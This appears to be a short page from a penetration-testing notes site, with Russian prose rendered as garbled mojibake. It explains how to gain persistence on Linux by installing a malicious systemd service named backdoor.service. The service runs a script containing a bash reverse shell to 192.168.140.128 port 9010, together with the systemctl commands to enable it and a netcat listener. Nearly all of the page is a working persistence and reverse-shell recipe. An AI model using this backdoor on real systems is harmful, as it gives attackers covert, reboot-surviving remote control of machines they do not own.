05 - Systemd
systemd β ΡΡΠΎ ΡΠΈΡΡΠ΅ΠΌΠ° ΠΈΠ½ΠΈΡΠΈΠ°Π»ΠΈΠ·Π°ΡΠΈΠΈ ΠΈ ΠΌΠ΅Π½Π΅Π΄ΠΆΠ΅Ρ ΡΠ»ΡΠΆΠ± Π² Π±ΠΎΠ»ΡΡΠΈΠ½ΡΡΠ²Π΅ Π΄ΠΈΡΡΡΠΈΠ±ΡΡΠΈΠ²ΠΎΠ² Linux. ΠΠ°Π³ΡΡΠΆΠ°Π΅Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΡΡΠΊΠΎΠ΅ ΠΏΡΠΎΡΡΡΠ°Π½ΡΡΠ²ΠΎ ΠΈ Π΄Π°Π»ΡΡΠ΅ ΡΠΏΡΠ°Π²Π»ΡΠ΅Ρ ΡΠΈΡΡΠ΅ΠΌΠ½ΡΠΌΠΈ ΠΏΡΠΎΡΠ΅ΡΡΠ°ΠΌΠΈ. ΠΠ½Π°ΡΠΈΡ ΡΠΎΠ·Π΄Π°Π² ΡΠΎΠ±ΡΡΠ²Π΅Π½Π½ΡΡ Π²ΡΠ΅Π΄ΠΎΠ½ΠΎΡΠ½ΡΡ ΡΠ»ΡΠΆΠ±Ρ systemd, ΠΌΡ ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΠΎΠ»ΡΡΠΈΡΡ Π±ΡΠΊΠ΄ΠΎΡ, ΠΊΠΎΡΠΎΡΡΠΉ Π±ΡΠ΄Π΅Ρ Π·Π°ΠΏΡΡΠΊΠ°ΡΡΡΡ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠΈ ΠΏΡΠΈ Π·Π°ΠΏΡΡΠΊΠ΅ ΠΠ‘. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ Π½Π°ΠΌ ΠΏΠΎΠ½Π°Π΄ΠΎΠ±ΠΈΡΡΡ 2 ΡΠ°ΠΉΠ»Π°:
Π€Π°ΠΉΠ» ΡΠ»ΡΠΆΠ±Ρ systemD
Π€Π°ΠΉΠ» Π²ΡΠ΅Π΄ΠΎΠ½ΠΎΡΠ½ΠΎΠ³ΠΎ ΡΠΊΡΠΈΠΏΡΠ° (ΠΊΠΎΡΠΎΡΡΠΉ ΠΎΡΠ΄Π°ΡΡ Π½Π°ΠΌ revers shell)
// Π‘ΠΎΠ·Π΄Π°Π΅ΠΌ ΡΠ°ΠΉΠ» ΡΠ»ΡΠΆΠ±Ρ /etc/systemd/system/backdoor.service
[Unit]
Description=backdoor service
After=network.target
[Service]
Type=simple
ExecStart=/opt/backdoor.sh
Restart=on-abort
[Install]
WantedBy=multi-user.target
// Π‘ΠΎΠ·Π΄Π°Π΅ΠΌ ΡΠ°ΠΉΠ» Π²ΡΠ΅Π΄ΠΎΠ½ΠΎΡΠ½ΠΎΠ³ΠΎ ΡΠΊΡΠΈΠΏΡΠ° /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1
// ΠΠ΅ΡΠ΅Π·Π°ΠΏΡΡΠΊΠ°Π΅ΠΌ ΡΠ»ΡΠΆΠ±Ρ ΠΈ Π΄ΠΎΠ±Π°Π²Π»ΡΠ΅ΠΌ Π½Π°Ρ ΡΠ΅ΡΠ²ΠΈΡ Π² Π°Π²ΡΠΎΠ·Π°Π³ΡΡΠ·ΠΊΡ
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
// ΠΠ° Ρ
ΠΎΡΡΠ΅ Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ Π·Π°ΠΏΡΡΠΊΠ°ΠΌ netcat
nc -lvp 9010
ΠΡ ΠΏΠΎΠ»ΡΡΠΈΠΌ ΡΠ΅Π»Π» ΠΏΠΎΡΠ»Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Ρ systemctl start backdoor.service ΠΈ ΠΊΠ°ΠΆΠ΄ΡΠΉ ΡΠ°Π· ΠΊΠΎΠ³Π΄Π° Π°ΡΠ°ΠΊΡΠ΅ΠΌΡΠΉ Ρ ΠΎΡΡ Π±ΡΠ΄Π΅Ρ ΠΏΠ΅ΡΠ΅Π·Π°Π³ΡΡΠΆΠ΅Π½.
Last updated